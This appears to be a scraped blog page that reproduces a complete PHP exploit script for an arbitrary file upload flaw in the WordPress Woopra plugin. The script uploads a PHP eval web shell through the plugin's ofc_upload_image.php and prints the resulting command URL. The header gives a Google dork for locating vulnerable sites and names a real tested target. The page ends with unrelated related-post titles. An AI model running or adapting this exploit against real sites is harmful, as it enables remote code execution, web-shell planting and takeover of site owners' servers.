WordPress Woopra plugin remote PHP arbitrary code execution exploit.
测试方法:
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
- # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
- # Date: [06-10-2013]
- # Exploit Author: wantexz
- # Vendor Homepage:wordpress.org/plugins/woopra/
- # Software Link: wordpress.org/plugins/woopra
- # Version: woopra
- # Tested on: [wantexz]
- # CVE :
- # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
- ############################################################################################
- # INDONESIANCODER
- # by
- # WANTEXZ
- #
- ############################################################################################
- <?php
- # woopra plugins ~ Exploit
- # http://indonesiancoder.com/
- #
- echo <<<EOT
- # -----------------------------------
- #/ woopra ~ Exploit \
- #\ Author: wantexz /
- # -----------------------------------
- ################################################################################################
- # Author: WANTEXZ
- #
- # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
- # all indonesian coder, indonesian defacer, kill-9
- ,jatimcom , malangcyber
- #
- ################################################################################################
- EOT;
- $options = getopt('u:f:');
- if(!isset($options['u'], $options['f']))
- die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
- -u http://target.com/ The full path to Joomla!
- -f shell.php The name of the file to create.\n");
- $url = $options['u'];
- $file = $options['f'];
- $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
- $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
- $data ="<?php eval(\$_GET['cmd']); ?>";
- $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
- rv:15.0) Gecko/20100101 Firefox/15.0.1',
- 'Content-Type: text/plain');
- echo " [+] Submitting request to: {$options['u']}\n";
- $handle = curl_init();
- curl_setopt($handle, CURLOPT_URL, $url);
- curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
- curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
- curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
- $source = curl_exec($handle);
- curl_close($handle);
- if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
- @fopen($shell,'r'))
- {
- echo " [+] Exploit completed successfully!\n";
- echo " ______________________________________________\n\n
- {$shell}?cmd=system('id');\n";
- }
- else
- {
- die(" [+] Exploit was unsuccessful.\n");
- }
- ?>
WordPress Woopra plugin remote PHP arbitrary code execution exploit.的更多相关文章
- Apache / PHP 5.x Remote Code Execution Exploit
测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...
- DayuCMS 1.525 /include/global.func.php Foreground Arbitrary Code Execution
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://joychou.org/in ...
- [EXP]Microsoft Windows CONTACT - Remote Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...
- CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...
- Insecure default in Elasticsearch enables remote code execution
Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to exe ...
- [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...
- MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...
- Roundcube 1.2.2 - Remote Code Execution
本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...
- [EXP]Apache Superset < 0.23 - Remote Code Execution
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...
随机推荐
- ASP.NET页面生命周期总结(2)
HttpAplicationFactory获取一个HttpApplication对象: 内部:1.如果是第一次请求过来,那么就把global文件编译成一个类型.(后续请求来的,就可以直接获取这个类型) ...
- javascript 将多维数组转换为一维数组
/** * 2013年9月去面试的时候,有面试过这样子一道题目: * 题目是这样子的:将一个多维数组转换成一维数组并返回该数组,类似 * [1,2,3,[4,5,6,[7,8]],9]转换后为:[1, ...
- eclipse+PyDev 中报错"scrapy.spiders.Spider" ,可用"# @UndefinedVariable"压制.
# -*- coding:utf-8 -*- ''' Created on 2015年10月22日 (1.1) 例子来源: http://scrapy-chs.readthedocs.org/zh_C ...
- 贪心算法:旅行商问题(TSP)
TSP问题(Traveling Salesman Problem,旅行商问题),由威廉哈密顿爵士和英国数学家克克曼T.P.Kirkman于19世纪初提出.问题描述如下: 有若干个城市,任何两个城市之间 ...
- STL:remove和erase区别
C++ STL中的remove和erase函数曾经让我迷惑,同样都是删除,两者有什么区别呢? vector中的remove的作用是将等于value的元素放到vector的尾部,但并不减少vector的 ...
- 九度OJ 1452 搬寝室 -- 动态规划
题目地址:http://ac.jobdu.com/problem.php?pid=1452 题目描述: 搬寝室是很累的,xhd深有体会.时间追述2006年7月9号,那天xhd迫于无奈要从27号楼搬到3 ...
- (转)UIButton用法详解一
(注明 来源网址 http://blog.csdn.net/cheneystudy/article/details/8115092)这段代码动态的创建了一个UIButton,并且把相关常用的属性都列举 ...
- 【ADO.NET】6、SQLHelper简单封装
using System.Data.SqlClient;using System.Configuration;引用:System.Configuration 连接字符串放到配置文件中 新建一个类,写如 ...
- 浅谈.prop() 和 attr() 的区别
今天编码时遇到一个问题,通过后台查询的数据设置前端checkbox的选中状态,设置选中状态为.attr('checked','true');没有问题,但是当数据重新加载时,checkbox应清空即所有 ...
- JS如果阻止事件冒泡和浏览器默认事件
原地址:http://missra.com/article/web-57.html 嵌套的标签元素,如果父元素和子元素都绑定了一些事件,那么在点击最内层子元素时可能会触发父级元素的事件,下面介绍一下J ...